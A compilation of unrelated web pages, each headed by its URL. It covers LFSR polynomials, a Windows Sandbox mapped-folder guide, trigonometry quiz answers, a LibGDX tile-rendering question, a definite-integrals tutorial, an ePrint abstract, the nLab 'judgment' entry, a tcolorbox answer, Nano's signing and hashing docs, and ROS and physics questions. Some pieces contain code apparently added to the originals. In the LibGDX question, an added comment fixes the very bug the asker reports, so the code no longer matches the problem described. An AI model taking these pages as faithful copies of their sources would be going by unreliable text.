• No. The feedback bit is represented by the highest degree monomial in the polynomial (which is $x^4$). The 1 in the polynomial represents the zeroth bit in the register ($s_1$ in your notation) and the $x^3$ represents the bit in position 3 of the register ($s_4$ in your notation). Thus $x^4+x^3+1=0$ is the same as saying $x^4=x^3+1$ which says that the feedback bit is the xor of $s_4$ and $s_1$ in your notation. – Daniel Shiu Mar 26 at 15:18
• Thank you so much! Your explanations are very clear. – hollyjolly Mar 26 at 15:26
• @hollyjolly: here, the generally appropriate way to thank for an answer is up-voting (up-arrow). And the appropriate way to tell the answer solves the question is accepting it (tick). "Thanks" comments are possible for extraordinarily difficult/long/bright answer, though. – fgrieu Mar 27 at 15:53
https://windowsloop.com/windows-sandbox-shared-folder/
# How to Create Shared Folder in Windows Sandbox – Map Folder
With configuration files, you can create a shared folder between Windows Sandbox and the host OS. Here are the steps to map a folder into Windows Sandbox in Windows 10.
One of the best things in the latest Windows 10 update is the Windows Sandbox. The sandbox allows you to launch full Windows in a virtual environment so that you can test untrusted software or settings before applying them to the actual system. When you close the sandbox, all changes are lost. This keeps the system safe and secure from malicious software and unwanted changes. Compared to alternatives like VMware or VirtualBox, Windows Sandbox is lightweight and easy to use.
You can enable Windows Sandbox from the Windows Features panel. Once enabled, launch it from the Start menu and you are good to go. There is no need for any complicated setup. That being said, being lightweight means a compromise in terms of features. To deal with this Microsoft introduced the Windows Sandbox configuration file. Using the configuration files, you can do a lot of things like adding shared folders, virtual graphics, networking, startup scripts, etc.
For instance, to share files between host and Windows Sandbox, you can create a shared folder in Windows Sandbox. The shared folder gives you greater control over how and which files or data to share.
In this quick guide, let me show the procedure to share a folder with Windows Sandbox in Windows 10.
## Windows Sandbox Shared Folder
These are the steps to follow to create shared folder between Windows Sandbox and Windows 10.
1. Open File Explorer with “Windows Key + E” keyboard shortcut.
2. Go to C drive.
3. Right-click and select “New → Folder” to create a folder.
4. Type “WS Config Files” as the folder name.
5. Open the folder you just created.
6. Right-click and select “New → Text Document” to create a text file.
7. Rename the file to "MappedFolders.wsb". You can name the file anything you want, but it is important that you replace the .txt extension with .wsb.
8. Open the WSB file with Notepad. Right-click on the file and select “Open with → Notepad“.
9. Copy the below code and paste it in the Notepad. Replace the dummy folder path with the actual path of the folder you want to share or map.
<Configuration>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\Path\to\Folder</HostFolder>
      <ReadOnly>false</ReadOnly>
    </MappedFolder>
  </MappedFolders>
</Configuration>
10. If you want the shared folder to be read-only, change the value from false to true on line 5.
11. Save the file with the “Ctrl + S” keyboard shortcut.
12. Now, double-click on the "MappedFolders.wsb" file to launch Windows Sandbox.
13. After launching the sandbox, you will see the shared folder directly on the Desktop.
14. You can open it like any other folder.
Unlike regular Windows, Windows Sandbox mounts the shared folders directly on the desktop. That is the reason why you see the shared folder on the desktop rather than in the Network panel in File Explorer.
You can map multiple folders in Windows Sandbox. All you have to do is duplicate the <MappedFolder> tag in the above code. This is how it looks when you add multiple shared folders in Windows Sandbox.
<Configuration>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\Path\to\Folder1</HostFolder>
      <ReadOnly>false</ReadOnly>
    </MappedFolder>
    <MappedFolder>
      <HostFolder>C:\Path\to\Folder2</HostFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
    <MappedFolder>
      <HostFolder>C:\Path\to\Folder3</HostFolder>
      <ReadOnly>false</ReadOnly>
    </MappedFolder>
  </MappedFolders>
</Configuration>
As you can see, all we did was duplicate the MappedFolder tag in the code. You can also set the read-only mode for each mapped folder individually. Alternatively, you can also create multiple configuration files for each shared folder.
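If you would rather generate the configuration programmatically, here is a small Python helper (not part of the original steps; the folder paths are placeholders to replace with your own):

folders = [
    (r"C:\Path\to\Folder1", False),   # (host folder, read-only?)
    (r"C:\Path\to\Folder2", True),
]

entries = "".join(
    "  <MappedFolder>\n"
    f"    <HostFolder>{path}</HostFolder>\n"
    f"    <ReadOnly>{'true' if readonly else 'false'}</ReadOnly>\n"
    "  </MappedFolder>\n"
    for path, readonly in folders
)

config = ("<Configuration>\n  <MappedFolders>\n"
          + entries
          + "  </MappedFolders>\n</Configuration>\n")

with open("MappedFolders.wsb", "w") as f:
    f.write(config)   # double-click the resulting file to launch the sandbox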
Important note: To access the shared folders in Windows Sandbox, you have to launch it using the configuration file. If you launch Windows Sandbox directly from the Start menu, you will not see the shared folders.
## FAQ: Windows Sandbox Mapped Shared Folders
Can I share folders with Windows Sandbox?
Yes. You can share any Windows folder with Windows Sandbox using the configuration files. You can find the steps to create Windows Sandbox Mapped Folder configuration file above.
How to protect Windows Sandbox shared folder?
To protect host folders, you can set the shared folders in read-only mode. When in read-only mode, Windows Sandbox cannot write or change data in the shared folder.
Can I share multiple folders with Windows Sandbox?
Yes. Using the same configuration file, you can map multiple folders. Instructions on how you can do it can be found above.
I hope that helps. If you are stuck or need some help, comment below and I will try to help as much as possible.
https://en.wikiversity.org/wiki/Introduction_to_Calculus/Quiz_1/Answers
If you can pass this quiz, you are ready to take this course
1. Evaluate ${\displaystyle \tan(\theta )\,\ }$ in terms of ${\displaystyle \sin(\theta )\,\ }$
${\displaystyle \tan(\theta )=\sin(\theta )/{\sqrt {1-\sin ^{2}(\theta )}}\,\ }$
Shyam (T/C)
2. If ${\displaystyle \csc(\theta )=1/x,\,\ }$ then what does ${\displaystyle x\,\ }$ equal?
${\displaystyle x=\sin(\theta )\,\ }$ where ${\displaystyle x\in [-1,1]\,\ }$
Shyam (T/C)
3. Prove ${\displaystyle \tan ^{2}(\theta )+1=\sec ^{2}(\theta )\,\ }$using ${\displaystyle \,\ \sin ^{2}(\theta )+\cos ^{2}(\theta )=1}$
${\displaystyle \sin ^{2}(\theta )+cos^{2}(\theta )=1\,\ }$
divide both sides by ${\displaystyle \cos ^{2}(\theta )=>\sin ^{2}(\theta )/cos^{2}(\theta )+1=1/cos^{2}(\theta )\,\ }$
${\displaystyle =>\tan ^{2}(\theta )+1=sec^{2}(\theta )\,\ }$
Shyam (T/C)
4. ${\displaystyle \cos(A+B)=\cos(A)\cos(B)-\sin(A)\sin(B)\,\ }$
• Find the double angle identities for the cosine function using the above rule.
replace ${\displaystyle B\,\ }$ by ${\displaystyle A=>\cos(A+A)=\cos(A)\cos(A)-\sin(A)\sin(A)\,\ }$
${\displaystyle =>\cos(2A)=\cos ^{2}(A)-\sin ^{2}(A)\,\ }$
Shyam (T/C)
• Find the half angle identities from the double angle identities.
${\displaystyle =>\cos(2A)=\cos ^{2}(A)-\sin ^{2}(A)\,\ }$
replace ${\displaystyle A\,\ }$ by ${\displaystyle A/2=>\cos(A)=2\cos ^{2}(A/2)-1\,\ }$ using ${\displaystyle \sin ^{2}(A)+\cos ^{2}(A)=1\,\ }$
Shyam (T/C)
• Find the value of ${\displaystyle \,\ \cos ^{2}(\theta )}$ without exponents using the above rules
${\displaystyle =>\cos(2\theta )=2\cos ^{2}(\theta )-1\,\ }$
${\displaystyle =>\cos ^{2}(\theta )=(1+\cos(2\theta ))/2\,\ }$
Shyam (T/C)
• (Challenge) Find the value of ${\displaystyle \,\ \cos ^{3}(\theta )}$ without exponents
${\displaystyle \cos(3\theta )=cos(\theta +2\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )\cos(2\theta )-sin(\theta )\sin(2\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )(2\cos ^{2}(\theta )-1)-sin(\theta )(2\sin(\theta )\cos(\theta ))\,\ }$ using ${\displaystyle \cos(2\theta )=2\cos ^{2}(\theta )-1\,\ }$ and ${\displaystyle \sin(2\theta )=2\sin(\theta )\cos(\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )((2\cos ^{2}(\theta )-1)-2sin^{2}(\theta ))\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )(4\cos ^{2}(\theta )-3)\,\ }$ using ${\displaystyle \,\ \sin ^{2}(\theta )+\cos ^{2}(\theta )=1}$
${\displaystyle =>4\cos ^{3}(\theta )=cos(3\theta )+3cos(\theta )\,\ }$
${\displaystyle =>\cos ^{3}(\theta )=(cos(3\theta )+3cos(\theta ))/4\,\ }$
Shyam (T/C) 19:42, 18 November 2006 (UTC)
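A quick numeric spot-check of the final identity (a minimal Python sketch):

import math

# cos^3(t) = (cos(3t) + 3*cos(t)) / 4 at a few sample angles
for t in (0.3, 1.1, 2.5):
    lhs = math.cos(t) ** 3
    rhs = (math.cos(3 * t) + 3 * math.cos(t)) / 4
    assert math.isclose(lhs, rhs)
print("identity holds at the sampled points")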
https://gamedev.stackexchange.com/questions/151940/tile-rendering-problem-in-libgdx
# Tile rendering problem in LibGDX
I'm making an isometric game using a Tiled map with libgdx. As I want my character to be rendered before or after the tiles depending on his position, I create an ArrayList<Renderable> and add my character and the tiles to it.
TiledMapTileLayer midlayer = (TiledMapTileLayer) map.getLayers().get(4); //The layer containing my tiles.
int width = midlayer.getWidth();
int height = midlayer.getHeight();
ArrayList<Renderable> renderables = new ArrayList<Renderable>();
renderables.add(character); //Adding the character in the list;
//We add to the list every midlayer's tile, so we can later sort
for (int i = 0; i < width; i++) {
    for (int j = 0; j < height; j++) {
        if (midlayer.getCell(i, j) != null) { // The cell may or may not exist at that position.
            renderables.add(new RenderableTile(
                    midlayer.getCell(i, j).getTile().getTextureRegion(), i, j));
        }
    }
}
RenderableTile is a class I created containing an x and y position and the TextureRegion.
public class RenderableTile implements Renderable, Comparable<Renderable> {
    private int x;
    private int y;
    private TextureRegion texture;

    public RenderableTile(TextureRegion texture, int x, int y) {
        this.x = x;
        this.y = y;
        // The original constructor took a parameter named "text" but assigned
        // "this.texture = texture", so the field was never set -- a likely
        // cause of the broken rendering.
        this.texture = texture;
    }

    @Override
    public void render(SpriteBatch batch, BitmapFont font) {
        batch.begin();
        int rX = Translations.TransX(x, y); // transform orthogonal position to isometric rendering
        int rY = Translations.TransY(x, y) - 15;
        batch.draw(texture, rX, rY);        // draw the stored texture region
        batch.end();
    }
}
The sorting works perfectly, and the ArrayList seems containing the right tiles. But when I render I get this:
Instead of something like this:
This is really awkward; when I try to render a single tile at a specific point, it works normally.
Maybe there is an alternative solution?
https://articles.outlier.org/how-to-do-definite-integrals
# Definite Integrals: What Are They and How to Calculate Them
## Rachel McLean
Subject Matter Expert
Knowing how to find definite integrals is an essential skill in calculus. In this article, we’ll learn the definition of definite integrals, how to evaluate definite integrals, and practice with some examples.
## Defining Definite Integrals
What is a definite integral? Definite integrals are used to calculate the area between a curve and the x-axis on a specific interval. (If you need to review, see our beginner's guide to integrals).
If we want to evaluate the definite integral of a real-valued function $f$ with respect to $x$ on the interval [a, b], where $a$ and $b$ are real numbers and $a \leq b$, we use the following notation:
$\int_{a}^{b} f(x)dx = A$
In this notation, the curved integral sign $\int$ indicates the operation of taking an integral. The rest of this notation is composed of three parts:
• The integrand $f(x)$
• The integral bounds $a$ and $b$, where $a$ is the lower bound and $b$ is the upper bound. These are also referred to as limits.
• The differential $dx$, which tells us that we are integrating $f$ with respect to the variable $x$.
Altogether, this notation represents the area enclosed by $f(x)$, the x-axis, and the lines $x=a$ and $x=b$. Graphically, we can visualize $\int_{a}^{b} f(x)dx$ as something like this:
## Definite Integrals vs. Indefinite Integrals
Before we learn exactly how to solve definite integrals, it’s important to understand the difference between definite and indefinite integrals.
Definite integrals find the area between a function’s curve and the x-axis on a specific interval, while indefinite integrals find the antiderivative of a function. Finding the indefinite integral and finding the definite integral are operations that output different things.
Calculating the indefinite integral takes in one function, and outputs another function: the antiderivative function of $f(x)$, notated by $F(x)$.
This output function is accompanied by an arbitrary constant C and does not involve lower and upper boundaries. By contrast, calculating the definite integral always outputs a real number, which represents the area under the curve on a specific interval. You can see the difference in their notations below:
• The indefinite integral $\int f(x)dx = F(x) + C$
• The definite integral $\int_{a}^{b} f(x)dx = A$, for some real number A.
Given $f(x)$, the indefinite integral answers the question, “What function, when differentiated, gives us $f(x)$?” The indefinite integral gives us a family of functions $F$ since infinite functions will satisfy this question. Thus, the indefinite integral gives us an “indefinite” answer. The definite integral gives us a real number — a unique “definite” answer.
You can learn more about the difference with this lesson sample on indefinite integrals by one of our instructors Dr. Hannah Fry.
## How to Calculate Definite Integrals
To find the definite integral of a function, we can use the Fundamental Theorem of Calculus, which states: If $f$ is continuous and $F$ is an antiderivative of $f$, then $\int_{a}^{b} f(x)dx = [F(x)]^b_a = F(b) - F(a)$.
This means that to find the definite integral of a function on the interval [a, b], we simply take the difference between the antiderivative evaluated at the upper bound $b$ and the antiderivative evaluated at the lower bound $a$.
We can break this process down into four steps:
1. Find the indefinite integral $F(x)$. You can use the Rules of Integration that you learned with indefinite integrals to help with this part.
2. Find $F(b)$. This is found by plugging the upper bound $b$ into the indefinite integral found in Step 1.
3. Find $F(a)$. This is found by plugging the lower bound $a$ into the indefinite integral found in Step 1.
4. Take the difference $F(b) - F(a)$.
Let’s do one example together. Let’s calculate the definite integral of the function $f(x) = 4x^3-2x$ on the interval [1, 2].
We'll follow the four steps given above.
Step 1:
$\int (4x^3-2x) dx = x^4 - x^2 = F(x)$
Step 2:
$F(2) = 2^4-2^2 = 16-4 = 12$
Step 3:
$F(1) = 1^4-1^2 = 1-1 = 0$
Step 4:
$F(2)-F(1) = 12 - 0 = 12$
Thus, $\int_{1}^{2} (4x^3-2x) dx = 12$.
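Such computations are easy to check symbolically; a minimal sketch using the sympy library (assuming it is installed):

import sympy as sp

x = sp.symbols('x')
F = sp.integrate(4*x**3 - 2*x, x)                 # antiderivative: x**4 - x**2
area = sp.integrate(4*x**3 - 2*x, (x, 1, 2))      # definite integral on [1, 2]
print(F, area)                                    # x**4 - x**2, 12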
## Properties of Definite Integrals and Key Equations
Let’s review some of the key properties of definite integrals. These will be useful for solving more complex integral problems. In the following properties, assume that $f$ and $g$ are continuous functions, and let $k$ be a constant.
### Zero-Length Interval Rule
When a=b, the interval has length 0, and so the definite integral of a function on [a, b] is 0.
$\int_{a}^{a} f(x)dx = 0$
### Reverse Bounds Rule
To find the definite integral of a function on [a, b] where $a > b$, we can simply reverse the sign of $\int_{b}^{a} f(x)dx$.
$\int_{a}^{b} f(x)dx = -\int_{b}^{a} f(x)dx$
### Interval Additivity Rule
If $a$, $b$, and $c$ are real numbers on a closed interval, then $\int_{a}^{c} f(x)dx$ can be found by adding integrals as follows:
$\int_{a}^{c} f(x)dx = \int_{a}^{b} f(x)dx + \int_{b}^{c} f(x)dx$
### Constant Multiplier Rule
You can pull constants outside of an integral.
$\int_{a}^{b} kf(x)dx = k\int_{a}^{b} f(x)dx$
### Sum and Difference Rule
The integral of the sum or difference of two functions is the sum or difference of their integrals.
$\int_{a}^{b} [f(x) \pm g(x)]dx = \int_{a}^{b} f(x)dx \pm \int_{a}^{b} g(x)dx$
### Integral of a Constant Rule
The integral of a constant over [a, b] is equal to the constant multiplied by the difference $b-a$.
$\int_{a}^{b} kdx = k(b-a)$
### Comparison Properties of Definite Integrals
• If $f(x) \geq 0$ on [a, b], then $\int_{a}^{b} f(x)dx \geq 0$.
• If $f(x) \leq 0$ on [a, b], then $\int_{a}^{b} f(x)dx \leq 0$.
• If $f(x) \geq g(x)$ on [a, b], then $\int_{a}^{b} f(x)dx \geq \int_{a}^{b} g(x)dx$.
### Average Value of a Function
The average value of a function on [a, b] is defined by:
$f_{avg}=\frac{1}{b-a}\int_{a}^{b} f(x)dx=\frac{F(b)-F(a)}{b-a}$
### The Mean Value Theorem
This theorem tells us that there’s at least one point c inside the open interval (a,b) at which $f(c)$ will be equal to the average value of the function over [a, b]. That is, there exists a $c$ on (a, b) such that:
$f(c) = \frac{1}{b-a}\int_{a}^{b} f(x)dx$
or equivalently
$f(c)(b-a) = \int_{a}^{b} f(x)dx$
## 3 Practice Exercises and Solutions
Here are three exercises for you to practice how to do a definite integral and their solutions.
### Exercise 1
Calculate the definite integral of the function $f(x) = \cos{(x)}$ on the interval $[0, \frac{\pi}{2}]$.
### Solution:
$\int_{0}^{\frac{\pi}{2}} \cos{(x)}dx = [\sin{(x)}]^{\frac{\pi}{2}}_0$
$= \sin{(\frac{\pi}{2})} - \sin{(0)}$
$= 1 - 0$
$=1$
### Exercise 2
Determine the average value of $f(x) = 12x^2-2x$ on $[2, 4]$.
### Solution:
$f_{avg}=\frac{1}{4-2}\int_{2}^{4} (12x^2-2x)dx$
$=\frac{1}{2}\left[\frac{12x^3}{3}-\frac{2x^2}{2}\right]^4_2$
$=\frac{1}{2}\left[4x^3-x^2\right]^4_2$
$=\frac{1}{2}((4 \cdot 4^3-4^2)-(4 \cdot 2^3-2^2))$
$=\frac{1}{2}((256-16)-(32-4))$
$=\frac{1}{2}(240-28)$
$=\frac{1}{2}(212)$
$=106$
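The same answer can be verified with sympy (a minimal sketch; the factor 1/2 is 1/(b−a)):

import sympy as sp

x = sp.symbols('x')
f_avg = sp.Rational(1, 2) * sp.integrate(12*x**2 - 2*x, (x, 2, 4))
print(f_avg)   # 106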
### Exercise 3
Given that $\int_{3}^{10} f(x)dx = 17$ and $\int_{7}^{10} f(x)dx=9$, evaluate $\int_{3}^{7} f(x)dx$.
### Solution:
$\int_{3}^{10} f(x)dx = \int_{3}^{7} f(x)dx + \int_{7}^{10} f(x)dx$
$\int_{3}^{7} f(x)dx = \int_{3}^{10} f(x)dx - \int_{7}^{10} f(x)dx$
$\int_{3}^{7} f(x)dx = 17 - 9$
$\int_{3}^{7} f(x)dx = 8$
https://eprint.iacr.org/2021/066
## Cryptology ePrint Archive: Report 2021/066
A Deep Learning Approach for Active S-box Prediction of Lightweight Generalized Feistel Block Ciphers
Mohamed Fadl Idris and Je Sen Teh and Jasy Liew Suet Yan and Wei-Zhu Yeoh
Abstract: Block cipher resistance against differential cryptanalysis is commonly assessed by counting the number of active substitution boxes (S-boxes) using search algorithms or mathematical solvers that incur high computational costs. In this paper, we propose an alternative approach using deep neural networks to predict the number of active S-boxes, trading off exactness for real-time efficiency as the bulk of computational work is brought over to pre-processing (training). Active S-box prediction is framed as a regression task whereby neural networks are trained using features such as input and output differences, number of rounds, and permutation pattern. We first investigate the feasibility of the proposed approach by applying it on a reduced (4-branch) generalized Feistel structure (GFS) cipher. Apart from optimizing a neural network architecture for the task, we also explore the impact of each feature and its representation on prediction error. We then extend the idea to 64-bit GFS ciphers by first training neural networks using data from five different ciphers before using them to predict the number of active S-boxes for TWINE, a lightweight block cipher. The best performing model achieved the lowest root mean square error of 1.62 and R$^2$ of 0.87, depicting the feasibility of the proposed approach.
Category / Keywords: secret-key cryptography / Active s-boxes, block cipher, cryptanalysis, deep learning, differential cryptanalysis, lightweight cryptography, neural networks, TWINE
Date: received 17 Jan 2021, last revised 13 May 2021
Contact author: jesen_teh at usm my
Available format(s): PDF | BibTeX Citation
Note: This paper is not under consideration for publication in any journal as of the latest version of this preprint.
Short URL: ia.cr/2021/066
[ Cryptology ePrint archive ]
https://forum.albiononline.com/index.php/Thread/140919-New-Axe-Q-jump-range-is-not-9m/?postID=1095127&s=2bea3226a2364b68292c4c63acc679513e7b5d07
• # New Axe Q jump range is not 9m
I tested this alongside the daggers' 8m dash and it fell short, so it seems to be actually 6m or 7m instead of 9m as intended
• True. I just tested it. The range should be 9m, but it's more like 6-7m.
It can easily be tested with royal shoes, for their jump is 9m and you can clearly see there is a difference in distance.
This ability hits at 9m I suppose, but the character jumps only around 6-7m
Here it can be clearly seen if you compare Q on axes and F on shoes.
Also, this is similar with the avalonian axe, but even worse. The ava axe says range 10m, though it doesn't say leap 10m - just range 10m. So it hits to 10m for sure, but the character moves almost the same distance as the new axe Q, maybe even less than the new Q.
I suppose it has something to do with the particular animation on these abilities, since the animations are both pretty much the same
If it says 9m, it should be 9m - not 6-7m
The post was edited 2 times, last by Borbarad ().
http://ncatlab.org/nlab/show/judgment
# nLab judgment
# Judgments
## Idea
In formal logic, a judgment, or judgement, is a “meta-proposition”; that is, a proposition belonging to the meta-language (the deductive system or logical framework) rather than to the object language.
More specifically, any deductive system includes, as part of its specification, which strings of symbols are to be regarded as the judgments. Some of these symbols may themselves express a proposition in the object language, but this is not necessarily the case.
The interest in judgements is typically in how they may arise as theorems, or as consequences of other judgements, by way of the deduction rules in a deductive system. One writes
$\vdash J$
to mean that $J$ is a judgment that is derivable, i.e. a theorem of the deductive system.
## Examples
### In first-order logic
In first-order logic, a paradigmatic example of a judgement is the judgement that a certain string of symbols is a well-formed proposition. This is often written as "$P \;prop$", where $P$ is a metavariable standing for a string of symbols that denotes a proposition.
Another example of a judgement is the judgement that these symbols form a proposition proved to be true. This judgment is often written as “$P\;true$”.
Neither of these judgements is the same thing as the proposition $P$ itself. In particular, the proposition is a statement in the logic, while the judgement that the proposition is a proposition, or is provably true, is a statement about the logic. However, people often abuse notation and conflate a proposition with the judgment that it is true, writing $P$ rather than $P\;true$.
### In type theory
The distinction between judgements and propositions is particularly important in intensional type theory.
The paradigmatic example of a judgment in type theory is a typing judgment. The assertion that a term $t$ has type $A$ (written “$t:A$”) is not a statement in the type theory (that is, not something which one could apply logical operators to in the type-theoretic system) but a statement about the type theory.
Often, type theories include only a particular small set of judgments, such as:
• typing judgments (written $t:A$, as above)
• judgments of typehood (usually written $A \;type$)
• judgments of equality between typed terms (written say $(t=t'):A$)
(In a type theory with a type of types, judgments of typehood can sometimes be incorporated as a special case of typing judgments, writing $A:Type$ instead of $A\;type$.)
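For concreteness, proof assistants display exactly these judgment forms; a small illustration, using Lean 4 syntax:

-- typing judgment  t : A
#check (3 : Nat)                     -- reports: 3 : Nat
-- typehood expressed as a typing judgment  A : Type
#check Nat                           -- reports: Nat : Type
-- an equality of typed terms, provable by rfl because it holds judgmentally
example : (2 + 1 : Nat) = 3 := rfl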
These limited sets of judgments are often defined inductively by giving type formation, term introduction, term elimination, and computation rules (see natural deduction) that specify under what hypotheses one is allowed to conclude the given judgment.
These inductive definitions can be formalized by choosing a particular type theory to be the meta-language; usually a very simple type theory suffices (such as a dependent type theory with only dependent product types). Such a meta-type-theory is often called a logical framework.
## Hypothetical and generic judgments
It may happen that a judgment $J$ is only derivable under the assumptions of certain other judgments $J_1,\dots,J_n$. In this case one writes
$J_1,\dots,J_n \;\vdash J.$
Often, however, it is convenient to incorporate hypotheticality into judgments themselves, so that $J_1,\dots,J_n \;\vdash J$ becomes a single hypothetical judgment. It can then be a consequence of other judgments, or (more importantly) a hypothesis used in concluding other judgments. For instance, in order to conclude the truth of an implication $\phi\Rightarrow\psi$, we must conclude $\psi$ assuming $\phi$; thus the introduction rule for implication is
$\frac{\phi \;\vdash\; \psi}{\vdash\; \phi\Rightarrow\psi}$
with a hypothetical judgment as its hypothesis. See natural deduction for a more extensive discussion.
In a type theory, we may also consider the case where the hypotheses $J_i$ are typing judgments of the form $x:A$, where $x$ is a variable, and in which the conclusion judgment $J$ involves these variables as free variables. For instance, $J$ could be $\phi\;prop$, where $\phi$ is a valid (well-formed) proposition only when $x$ belongs to a specific type $X$. In this case we have a generic judgement, written
$(x \colon X) \;\vdash\; (\phi \; prop).$
which expresses that assuming the hypothesis or antecedent judgement that $x$ is of type $X$, as a consequence we have the succedent judgement that $\phi$ is a proposition. If on the right here we have a typing judgment
$(x \colon X) \;\vdash\; (t \colon A)$
we have a term in context.
For more about the precise relationship between the various meanings of $\vdash$ here, see natural deduction and logical framework.
While this may seem to be a very basic form of (hypothetical/generic) judgement, in systems such as dependent type theory or homotopy type theory, all of logic and a good bit more is based on just this.
## References
Foundational discussion of the notion of judgement in formal logic is in
• Per Martin-Löf, On the meaning of logical constants and the justifications of the logical laws, lecture series in Siena (1983) (web)
More on this is in in sections 2 and 3 of
• Frank Pfenning, Rowan Davies, A judgemental reconstruction of modal logic (2000) (pdf)
A textbook account is in section I.3 of
Something called judgement (Urteil) appears in
https://tex.stackexchange.com/questions/408160/tcolorbox-with-curved-sides
# tcolorbox with curved sides
I would like to create, using tcolorbox, a filled breakable rectangle with all sides curved, such as the one shown in the image.
I am not able to fill it correctly. If someone is willing to help, I would be grateful.
• We kindly suggest you to include a full minimal working example (MWE) to show what you have worked so far on, so we can help you further with this. – Cragfelt Dec 30 '17 at 10:06
• If Christian Hupfer's answer (below) solved your problem please mark it as accepted by clicking the check mark next to the answer. see: How does accepting an answer work? for more information. – Cragfelt Dec 30 '17 at 21:08
This can be achieved with layers and underlays.
The breakability is 'difficult' -- it is necessary to redraw the box tops and box bottoms depending on the position in the breaking sequence (in tcolorbox parlance: first, middle and last) -- this can be done with underlay first and underlay middle and last, and if the box is unbroken, use underlay unbroken.
The interior background of the real tcolorbox is not drawn at all, such that it does not paint over the following underlays.
The colors for the inner box and outer boxes can be changed by using new pgfkeys as done in \tcbset.
Please note that this might fail for the last box of a break sequence and produce hilarious results.
Now with broken boxes and the ability to change colours:
\documentclass{article}
\usepackage{blindtext}
\usepackage[most]{tcolorbox}
\usetikzlibrary{shapes.geometric,calc,backgrounds}
\newlength{\internalshift}
\setlength{\internalshift}{20pt}
\pgfdeclarelayer{background rounded rect}
\pgfsetlayers{background rounded rect,main}
\tcbset{%
innerboxcolback/.colorlet=tcbcol@innerback,
outerboxcolback/.colorlet=tcbcol@outerback,
outerboxcolframe/.colorlet=tcbcol@outerboxframe,
innerboxcolback=yellow,
outerboxcolback=cyan!20,
outerboxcolframe=blue,
}
\makeatletter
\newtcolorbox{curvedbox}[1][]{%
enhanced,
breakable,
colback=blue!20,
colframe=green,
innerboxcolback=yellow,
arc=\internalshift,
auto outer arc,
interior hidden,
frame hidden,
attach boxed title to top center,
boxed title style={colback=tcbcol@outerback,enhanced,frame hidden},
coltitle=black,
title={Title},
underlay={% Drawing the blue
\begin{pgfonlayer}{background rounded rect}
\draw[tcbcol@outerboxframe, line width=1.5pt, fill=tcbcol@outerback,rounded corners=1.5\internalshift] ($(frame.north west) + (0pt,1\internalshift)$) rectangle ($(frame.south east) - (0pt,\internalshift)$);
\draw[tcbcol@outerboxframe, line width=1.5pt,fill=tcbcol@outerback,rounded corners=1.5\internalshift] ($(frame.north west) - (0.5\internalshift,0.5\internalshift)$) rectangle ($(frame.south east) + (0.5\internalshift,0.5\internalshift)$);
\end{pgfonlayer}
},% End of underlay
% Now the yellow box underlay if the box is unbroken
underlay unbroken={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
% Now the yellow box underlay if the box is broken, provide rounded rectangles for the first at the bottom and for the middle and last on the top.
underlay first={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
underlay middle and last={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
#1
}
\makeatother
\begin{document}
\begin{curvedbox}
\blindtext[10]
\end{curvedbox}
\end{document}
• Thanks for your answer. You saved me a lot of time. Thank you once – Zeljko Hrcek Dec 30 '17 at 20:26
https://docs.nano.org/protocol-design/signing-hashing-and-key-derivation/
Signing, Hashing and Key Derivation
Signing algorithm: ED25519
ED25519 is an elliptic curve algorithm developed in an academic setting with a focus on security against side-channel attacks, performance, and fixing a lot of the little annoyances in most elliptic curve systems.[1] However, it should be noted that instead of using SHA-512 in the key derivation function, Nano uses Blake2b.
Incorrect, SHA-512 has been used:
0000000000000000000000000000000000000000000000000000000000000000 -> 3B6A27BCCEB6A42D62A3A8D02A6F0D73653215771DE243A63AC048A18B59DA29
Correct, Blake2b digested the seed:
0000000000000000000000000000000000000000000000000000000000000000 -> 19D3D919475DEED4696B5D13018151D1AF88B2BD3BCFF048B45031C1F36D1858
Hashing algorithm: Blake2
Compared to existing cryptocurrencies, the choice of hash algorithm is much less important since it is not being used in a Proof-of-Work context. In Nano, hashing is used purely as a digest algorithm against block contents. Blake2 is a highly optimized cryptographic hash function whose predecessor was a SHA3 finalist.[2]
Key derivation function: Argon2
Argon2 is used as the key derivation function for securing the account keys in the reference wallet.[3]
https://answers.ros.org/question/353187/nav-stack-costmap_2d-obstacle_layer-wrt-which-frame/
|
# Nav Stack Costmap_2d: obstacle_layer w.r.t. which frame
Hello there,
I have a few questions regarding the obstacle_layer used in costmap_2d for the Navigation Stack. I am unsure about parameters like min_obstacle_height and max_obstacle_height. I understand the meaning of these two parameters, but I really don't know with respect to which frame these heights should be specified. Is it w.r.t. /map, /odom, or /base_link? The same question applies to the parameter "origin_z" in the VoxelCostmapPlugin.
In my example, I am using a robot whose base_link is 6 cm above the ground. The /map frame (whose tf is published by AMCL, I guess) is at the same height as base_link, although I set /odom to be fully on the ground, meaning 6 cm below base_link in the z-direction.
Can anyone tell me how the mentioned parameters work exactly? Also, does anyone know if the /map frame should be on the same z-height as /odom or if it's normal that mine appears on the same height as base_link?
The sensor data is transformed into the global frame of the costmap, and then the obstacle height is checked. For a global costmap this is usually map, and for a local costmap it is often odom.
https://physics.stackexchange.com/questions/382275/what-is-fourth-dimension
|
# What is Fourth Dimension?
Before people get pissed at me for asking a question that has likely been asked more than a few times: I just want a simple answer. If the first dimension is that an object exists (collision), the second dimension is that it is flat (that there is color and reflection to it), and the third dimension is depth, would the fourth dimension be the perception of time, or simply perspective (seeing from a specific angle), or can it be both?
• This is as much a question of philosophy as physics. From a simplistic point of view, time is the 4th dimension, as it fits a lot of fairly simple equations in physics. But there are both mystical and eerie quantum-mechanical hypotheses of additional dimensions. – Hot Licks Jan 25 '18 at 20:29
• So in other words, we can guess, but we don't know for sure? If that's the case then I've already broken the rules! x3 – Konix25 Jan 25 '18 at 20:34
• The "fourth dimension" in relativity is "time", but it is a measure of relative simultaneity - it is not the same thing as "change", which appears to be a much more complex derived concept involving at least a 3-way relation. – Steve Jan 25 '18 at 23:27
